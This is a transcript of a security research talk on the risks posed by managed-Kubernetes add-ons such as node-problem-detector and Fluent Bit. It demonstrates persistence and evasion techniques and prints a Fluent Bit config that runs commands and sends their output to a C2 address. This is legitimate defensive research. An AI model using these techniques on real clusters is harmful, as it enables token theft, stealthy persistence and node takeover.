This research has been done in collaboration with Parak; however, he couldn't be here today, so you'll have to bear with me. OK, who am I? I'm also part of the threat research group. Before that, I published some work in runtime verification, of all things, before I moved to security. You might know me from the container scanning research and the Falco bypasses, various blogs on Kubernetes security, et cetera. I'm also a USENIX and EuroSys Artifact Evaluation Committee member. That's because I'm a firm believer in bridging the gaps between academic research and industry, and I think we're not doing this enough. All right, what's the talk about? The premise. The core Kubernetes cluster components are a necessity. Well, clearly — otherwise, how would you run the cluster without the API server? That's nonsense. User workloads are, of course, also a necessity, because otherwise, why would you stage a cluster at all? However, what about everything else? And by everything else, I mean the stuff that comes for free in the cluster — in the managed cluster, particularly. Everything around the logs: exporters, CSI drivers, metrics, et cetera, et cetera. Something that is not necessary for the existence of the cluster, but that is very critical for operating a production-level cluster — otherwise things get really tricky. Examples: the container watcher on GKE, the OSM controller on AKS, aws-node on EKS — but not kube-proxy. Because kube-proxy, from where I stand, is an integral part of the Kubernetes control plane, right? And CoreDNS, for example, too — we must have it. OK, and there are various lists of those add-ons slash middleware slash plugins — there are multiple names for that. However, there's no centralized source for those components. So we'll try to put some numbers on this.
In terms of numbers: if you stage a GKE or EKS cluster at v1.25, you'll get by default 25 DaemonSets, ReplicaSets, or StatefulSets — most of them in the kube-system namespace, of course. And I'm only considering native Kubernetes components, because there are more host-level components as well. So basically, we get a whole batch of those. OK, now that we're clear on the definition, let's go on with the premise. This is a cloud security talk, so like every cloud security talk, we must start with the shared responsibility model. However, let's take this model from the wider cloud down to the Kubernetes space. We can see that there's a horizontal separation between master nodes and worker nodes, but there's also a vertical separation, right? We have the control plane, marked blue; we have the green customer workloads; and everything in between. Virtual machines, hardware — this is clear: CSP responsibility, we're good. But what about that middleware, the stuff that's in the middle? The problem is that middleware runs as part of both the master nodes and the worker nodes. So this separation — where we as customers think we're responsible for the worker nodes and the CSP is responsible for the master nodes — is not clear, and the boundaries are blurred. And the most obvious problem is upgrades, right? Because cluster users focus on workload security, not the control plane and not the middleware — yet the vulnerability patching process isn't clear. Remember the previous research about the gray zone in the cloud, where our vulnerability research group found vulnerabilities in the OMI agent in Azure? It wasn't clear who was supposed to fix that — whether it was the customer's responsibility or the CSP's. And we have similar problems in our managed clusters. Two scenarios.
First scenario: the CSP wants to upgrade, but it requires user action. If you're running a production cluster, you know that upgrading the worker nodes is not a trivial action. Second scenario: the user wants to upgrade, but the component is controlled by the CSP, so they can't. We have a problem here. OK, before we go further, let's adjust our expectations, because now we're getting to the serious business. This is not a scoped piece of vulnerability research. This is not a security audit of Kubernetes components. And this talk is not about a threat model. But it is a bit of everything above. More importantly, this is a risk assessment of a previously unnoticed surface, and an initial attempt to draw conclusions — a call to arms, you name it. OK, now let's start with the hypothesis. First: middleware increases the attack surface. Good enough? Well, not really, because every piece of software increases the attack surface, right? So this is kind of a triviality. Let's try this one: middleware increases the attack surface significantly. But then you might ask: what is "significantly"? What does that mean? How about this one: middleware increases risk in a non-trivial way. I think this is a good one, because ultimately, as cluster operators, we want to know what the risk in the cluster is. And "non-trivial way" — I know it's a bit fluffy, but at least it leaves leeway for interpretation. So let's run with this. What do we need to do to confirm or disprove the hypothesis? Well, we need a method. So what we did: we performed analysis — RBAC and permissions analysis, image analysis, security posture and config, behavioral runtime and logs, et cetera, et cetera. Out of it, we derived a security risk assessment. Great, so let's go into the details. First of all, the basic security posture. Out of those 25 deployments, about a third of them actually share Linux namespaces with the host. It's not ideal, right?
That means more attack surface and more connection points between the container and the kernel. Not ideal — but hey, sometimes we need to do this. Another third of them have privileged containers, or containers with added capabilities beyond the default Kubernetes set — that could be NET_BIND_SERVICE, SYS_PTRACE, you name it. And an additional third of them mount sensitive host volumes. What does this mean? It's not just /var/log or something uninteresting — it's the host root, or /etc, or /sys, something juicy like that. So we can see that the footprint is pretty serious. In terms of privileges, these middleware workloads require quite a lot. Intuitively that's kind of OK, because they probably need those privileges to do their job, but it gives a sense of uneasiness about the impact, right? Because after all, risk is probability times impact. Next, image analysis. Middleware images have lots of vulnerabilities — well, what else is new, right? Here are a couple of examples; here we see 182 vulnerabilities. However, so do the core and control plane images. And in general, the number of vulnerabilities is proportional to the number of packages. So we really cannot state that middleware images are worse off than the core components — not for a good reason, just because the core components also suck — but we didn't want to go into statistical analysis to claim they have more vulnerabilities. So we left it at that and went into the behavioral analysis instead. That's the runtime stuff — ptrace, looking at what they're actually doing — and logs. And logs are a very interesting source, because they can show things like unexpected principals acting, unexpected permissions, or discrepancies between the CSPs.
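As an aside, the posture checks from a couple of slides back — shared host namespaces, privileged or capability-added containers, sensitive host mounts — boil down to something like this. A minimal sketch over pod specs as plain dicts; the sensitive-path list is an illustrative choice of ours, not an official one:

```python
# Sketch of the posture checks: shared host namespaces, privileged /
# extra-capability containers, and sensitive hostPath mounts.
SENSITIVE_HOST_PATHS = ("/", "/etc", "/sys", "/proc", "/var/lib/kubelet")

def posture_flags(pod_spec: dict) -> list:
    flags = set()
    # Sharing a host Linux namespace widens the container<->kernel surface.
    if any(pod_spec.get(k) for k in ("hostPID", "hostIPC", "hostNetwork")):
        flags.add("shared-host-namespace")
    for c in pod_spec.get("containers", []):
        sc = c.get("securityContext") or {}
        if sc.get("privileged"):
            flags.add("privileged")
        if (sc.get("capabilities") or {}).get("add"):
            flags.add("added-capabilities")
    for v in pod_spec.get("volumes", []):
        path = (v.get("hostPath") or {}).get("path", "")
        if path == "/" or any(
            path == p or path.startswith(p + "/")
            for p in SENSITIVE_HOST_PATHS if p != "/"
        ):
            flags.add("sensitive-host-mount")
    return sorted(flags)

# A hypothetical middleware pod spec exhibiting all three issues.
middleware_pod = {
    "hostPID": True,
    "containers": [{"name": "agent",
                    "securityContext": {"privileged": True,
                                        "capabilities": {"add": ["NET_ADMIN"]}}}],
    "volumes": [{"name": "etc", "hostPath": {"path": "/etc/kubernetes"}}],
}
print(posture_flags(middleware_pod))
# → ['added-capabilities', 'privileged', 'sensitive-host-mount', 'shared-host-namespace']
```

Running roughly this over the 25 default workloads is what produced the "about a third" numbers above.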
If you think about it, even the same component acting differently between the CSPs is evidence of something — either differences in behavior, or in the source code, or something interesting, basically. So, I hope you can see this. This is an example from AKS — the log explorer, I think. This is an event: an execution into a pod by the AKS problem detector — here's the username. And what it does is exec into the Konnectivity agent on AKS. This was the clue that apparently we have node-problem-detector in AKS. Before that, I didn't know it was there. So if, say, you run AKS or GKE, you might not have known this, but you're also running node-problem-detector. And that's going to be the star of our use case one. In short, node-problem-detector is like a health checker on steroids. It runs a bunch of checks on the node and reports whether everything is good or bad — as node conditions and events — to the API server. There's a parent repo, but AKS and GKE run their own versions: they modify the upstream repo, and we don't have access to that source. The interesting part is that starting at some version, NPD — node-problem-detector — runs as a host service, not as a DaemonSet. In EKS, according to the best practices guide, they still recommend installing the DaemonSet deployment; but on AKS and GKE, it runs as a host service. So let that sink in: there's a component in your AKS or GKE cluster that acts on the Kubernetes level — it executes into pods — and at the same time it runs as a host service, a root process, and it runs periodically. This is how it looks on the node — this is GKE, and I think this is AKS. You can see there's a node-problem-detector process, and it's picking up a bunch of configs. In terms of versions, the latest is v0.8.12 or v0.8.13, I think, and you can see that AKS and GKE at v1.25 are running v0.8.10, which is kind of old — about a year and a half. So not ideal, but hey.
All right, so the feature in scope — how can we exploit this component? That's the point of this presentation. The feature in scope, drum roll: the custom plugin monitor. That's a feature that extends the core functionality of NPD and basically lets us define new health checks. And this is the chain of attack that we'll perform in the next slide — we'll see the demo, and then I'll stop and analyze the attack. We go from the ability to write a script into a certain folder; node-problem-detector picks it up; and then we get all kinds of bounties in the form of persistence and periodic execution. All right, so demo number one. You might recognize the guestbook app, the PHP app from the GKE tutorials. I modified it a bit. We can see the frontend and the Redis follower — very realistic, I hope. And the problem with the frontend — well, I guess it's a minor problem — is that it just mounts /etc. It's kind of OK, right? Because /etc keeps configuration on the host, so I guess it needed the configuration. So it mounted /etc from the host, and that's what we're going to exploit. We have a load balancer exposing the IP outside, and this is how we can access the application. Just a regular messaging service, I guess. But the thing is that there's a guestbook PHP file there as well, with an unsanitized parameter called store that actually allows us to perform RCE. There we go. We can run `ls /`, and this is what the attacker sees. I didn't run the full enumeration, but the attacker can easily understand that this is a pod, and that this is likely AKS. And this looks interesting: host-config. That's the name of the mount — /etc from the actual host — and the attacker just goes into the place where NPD expects to see plugins, lists the plugins, and sees: oh, this really is an AKS worker node. So let's see what we can do with that. They can even dump a plugin.
This is how the plugin actually looks — it's just a bash script. Now, the problem is that the container runs as root, so of course they can update these bash scripts, and that's what we're going to do. I saved you the pain of watching me update this file through the URL line, but this is the final result. You can see that we're cat-ing the token and the namespace — the service account token from /var/lib/kubelet — and sending them to the C2 server. That's the point here. And on this screen, I'm staging my C2 server. Once I update that specific check script, it runs every minute — there's an additional folder with JSON configs that define how those scripts run, with a certain periodicity. And there we go: this is the C2, and we're getting the token and the kube-system namespace. This one, I think, is actually the OSM controller token, which is pretty powerful. So from this point on, we can go to the API server from outside and use this token, without relying on the pod at all. Because this part — /var/lib/kubelet — remember, this was read by node-problem-detector, not by the pod. It wasn't executed from the pod; it was executed on the node by node-problem-detector. That's how it got access to /var/lib/kubelet — the pod itself didn't have that. All right, so let's see what we had here. We could have started with a container escape, but we don't need to — we don't even need a compromised image — because we can exploit some kind of misconfiguration, a file-writing ability of the pod. And this can happen in any pod in the cluster. Why? Because node-problem-detector behaves like a DaemonSet: it runs on every worker node. So one mistake on one of the worker nodes is enough. And then we write the script.
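For reference, this is roughly the shape of an upstream-style custom plugin monitor config that ties a check script to a schedule. Field names follow the upstream node-problem-detector docs as I remember them; the paths and names here are illustrative, and the AKS/GKE forks may differ:

```json
{
  "plugin": "custom",
  "pluginConfig": {
    "invoke_interval": "60s",
    "timeout": "30s",
    "max_output_length": 80
  },
  "source": "health-checker",
  "conditions": [],
  "rules": [
    {
      "type": "temporary",
      "reason": "CheckFailed",
      "path": "/etc/node-problem-detector.d/plugin/check_health.sh",
      "timeout": "30s"
    }
  ]
}
```

The `path` points at a plain bash script that NPD invokes as root every `invoke_interval` — and that's exactly the hook being abused here: anything dropped into that plugin directory gets executed periodically on the host.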
Node-problem-detector pretty much immediately picks up the plugin, and then we have periodic execution as root to do nasty stuff — drop keys into .ssh, basically establish persistence, and eventually spread to other nodes through the use of the tokens. Now, the interesting part: first, this all happens under the radar of the API server. What are the consequences? There is no audit trace, and the admission controller is blind to this attack, because it happens underneath the API server. And we'll probably bypass the EDR as well, because node-problem-detector is known to all the EDR solutions — otherwise it would generate a bunch of false positives. So if you ask me, this is pretty cool. I guess it can be described as a Kubernetes privilege escalation: from writing into a certain folder in the pod context to owning all the nodes. OK, let's move on. Use case two: Fluent Bit. I bet everybody knows it — a very popular log management platform. It's installed on every GKE cluster, and you can install it according to the EKS best practices — you install it from upstream. The latest version is 1.8.12. OK, that's not very interesting, but what is interesting is the feature that we're going to exploit: the exec input plugin. With such a juicy name, of course we couldn't let it be. So we're going to use this construct. For those of you who've never used Fluent Bit: the config consists of a bunch of sections — input sections that define the source of the logs, then parser and filter sections that define actions on the logs, and then output sections that say where to send the logs. And with this nasty exec input, instead of defining a source of logs, you can just run a command — in this case, `ls /var/log`. But of course, we're not interested in the logs; we're interested in something more serious. And that's the attack flow: we'll update the ConfigMap used by Fluent Bit.
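The injected sections might look roughly like this — the `exec` input is real Fluent Bit functionality, while the tag, the choice of output plugin, and the C2 address here are illustrative:

```ini
[INPUT]
    Name          exec
    Command       hostname; id
    Interval_Sec  10
    Tag           exfil

[OUTPUT]
    Name    tcp
    Match   exfil
    Host    203.0.113.10
    Port    4444
    Format  json_lines
```

Every Fluent Bit pod that loads this config will run the commands every 10 seconds and ship their output off-cluster like any other log stream.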
Fluent Bit will pick up this malicious config, and because the cluster shrinks and expands, eventually the malicious ConfigMap will get picked up by all the new Fluent Bit pods. OK, so let's see this in action. We find ourselves in an EKS cluster; we see that we have only one node for now, to keep the demo simple. And in the pods, we can see that we have Fluent Bit — there it is. Now we dump the ConfigMaps. This is the Fluent Bit config — this is the ConfigMap we're going to use — and amazon-cloudwatch is the default namespace; I just followed the EKS best practices guide to install this DaemonSet. Now, if we take the ConfigMap and dump it, the pretty-printing doesn't know how to deal with it — it's a known problem that hasn't been solved. However, when you edit the ConfigMap, it is actually printed pretty. So what we're doing here: we're editing it and adding that construct — input, output, and all. For the sake of time, I'll skip ahead a bit and explain what happens. As the input, we define two commands, hostname and id — and we could chain as many commands as we want — and they will get executed by Fluent Bit every 10 seconds. You might not see it, but this is the 10-second interval. And then you give the output: what to do with this input. In this case, the output of these commands will get sent to our C2 server, to port 4444, and that's good enough for us. OK, so we were able to update the ConfigMap, and now we're just waiting. What are we waiting for? The ConfigMap update isn't picked up in real time, right? So we're waiting for a new node to get created and pick it up. Behind the scenes, to make it faster, I'm just increasing the number of nodes to two. And now I'm waiting for another node to appear — and then, hopefully, the next Fluent Bit pod (because it's a DaemonSet, right?) will pick up the new config and execute whatever we asked for. OK, so there we go.
We found the node, and then we see the additional pod created — this new Fluent Bit pod, great. And because we defined a 10-second interval, the commands should execute every 10 seconds. So in parallel we start our Python C2 server, and there we go — we're getting the command output. And you see that Fluent Bit packs it really nicely: it just runs hostname, then runs id, and packs them as JSON. We can use Fluent Bit's own functionality to exfiltrate whatever data we want. All right, so this was the second use case. What happened here? Our assumption — and I want to be very clear about our assumption — was that we had a misconfiguration, some kind of ConfigMap update permission. It happens. In this case, we were able to update the ConfigMap that Fluent Bit is using, and eventually, because a production cluster grows and shrinks — it's very dynamic — all the new nodes will go through this turnover and pick up the new ConfigMap. And we achieve all-node persistent execution. This is cool stuff, because it's resistant to restarts: the ConfigMap is saved in etcd, right? So even if nodes get restarted or new ones get created, they will pick up that malicious ConfigMap. And again, we're running underneath the API server: the admission controller is blind, there's no audit trace, and we probably bypass the EDR, because it all happens as Fluent Bit. Now, the impact is limited by what Fluent Bit can do, but typically Fluent Bit can collect tons of information — it's a log management platform, so there are tons of host paths mapped into it, and an attacker can use that. All right, what can we do to reduce the risk? The first thing, of course: use the security vendors. However, what's the problem with security vendors and control plane and middleware?
They typically whitelist control plane and middleware components — either by the kube-system namespace, or by Kubernetes users, or by container image names. Some examples: a Gatekeeper policy that excludes kube-system; this one, I think, is a Tracee rule that whitelists flanneld, kube-proxy, et cetera, based on the process name; and this is a Falco rule that whitelists based on the Kubernetes containers — this is a macro defined earlier elsewhere in the file, which just holds a list of whitelisted containers. So that's a problem. OK, what else can we use? Well, let's use PSS, right? That's the PSP v2. Well, not so fast, because you can't apply PSS to the kube-system namespace — and not just kube-system, but a couple more namespaces, like kube-node-lease and kube-public. And this is a problem, because we know that many, many middleware components are dumped automatically into the kube-system namespace, while on the other hand we can't use our typical Kubernetes security controls there. OK, what else can we use? Well, let's try user namespaces. This is a shiny new feature — in v1.25 it became alpha. It basically limits the impact of a container escape, so that container root is no longer host root. This is pretty cool. However, you can't use user namespaces on more than half of those components — on 13 out of 25, if I remember correctly. Why? Because there are certain conditions — we sketched this in our blog — where you just can't use user namespaces: for example, if you need access to resources managed by one of the initial namespaces. The thing with user namespaces is that they're very rigid and inflexible — it's everything or nothing. So unfortunately, we probably won't be able to use them on the middleware. What else? How about we just move all the middleware to the host level?
Well, but then you can't apply Kubernetes-level security controls, right? And they will probably get excluded from the EDRs as well. So this is also not a great solution. What is a good solution? Well, there isn't one here, but first of all: don't run containers as root. We've been repeating this mantra for years, but still most containers run as root, because it's handy. That would probably stop the first attack, right? The attacker wouldn't be able to write into /etc if not root. And this case is a bit different — what I wanted to show you with CoreDNS. CoreDNS has the same problem as Fluent Bit: it takes its configuration from the CoreDNS ConfigMap. By the way, it's installed on all EKS and AKS clusters by default. There's a plugin called `on` — does anybody know about it? I didn't. If you can update the ConfigMap, you can write something like this: `on startup`, and then command execution. So that's a problem. However, it's not use case number three. Why? Because this doesn't work. Why doesn't it work? Because: `touch: executable file not found`. Who knows what this is? It means CoreDNS doesn't have a shell execution context, because it's a slim container — they make slim images. It doesn't have a package manager either. So that works — as a defense. OK, two conclusions. Inclusive controls: we saw that our security controls don't take kube-system and middleware into account, unfortunately. And a word about threat models: if you remember, the CNCF Financial Services User Group created the trust boundaries and the attack trees for establishing persistence — you won't find middleware on those diagrams; it's all about the proper control plane. Another prominent example is the Trail of Bits security audit — these are the components they looked at. Do you see any middleware component? I don't see Fluent Bit here; I don't see node-problem-detector.
But it's still running on every AKS and GKE node. So, what to rethink? Perhaps we need to rethink our permissions. In my book, ConfigMap update is very powerful — it's admin, boom. Namespace update/patch is power user, because just by removing annotations and labels on a namespace, you can remove the security controls from that namespace. Perhaps we need to think about CSP-based mappings. Rethinking Kubernetes detection: we need a multi-level approach. We saw that it's not just a misconfiguration — you then need to understand the RBAC impact, you probably need log-based detection as well, and on top of that, you probably need agent-based detection — some kind of sensor on the node to detect this vector somehow. So you need this multi-level approach to the cluster; just one thing alone won't work against these complex attacks. And eventually, rethinking CSP visibility. The ultimate question: what do we really have on our worker nodes? I hope this talk was a first step towards answering that question. So that's all I had for today. Thank you so much for coming. I'll be happy to take questions if we have time; if not, I'll just hang around here and by the snacks. Thank you.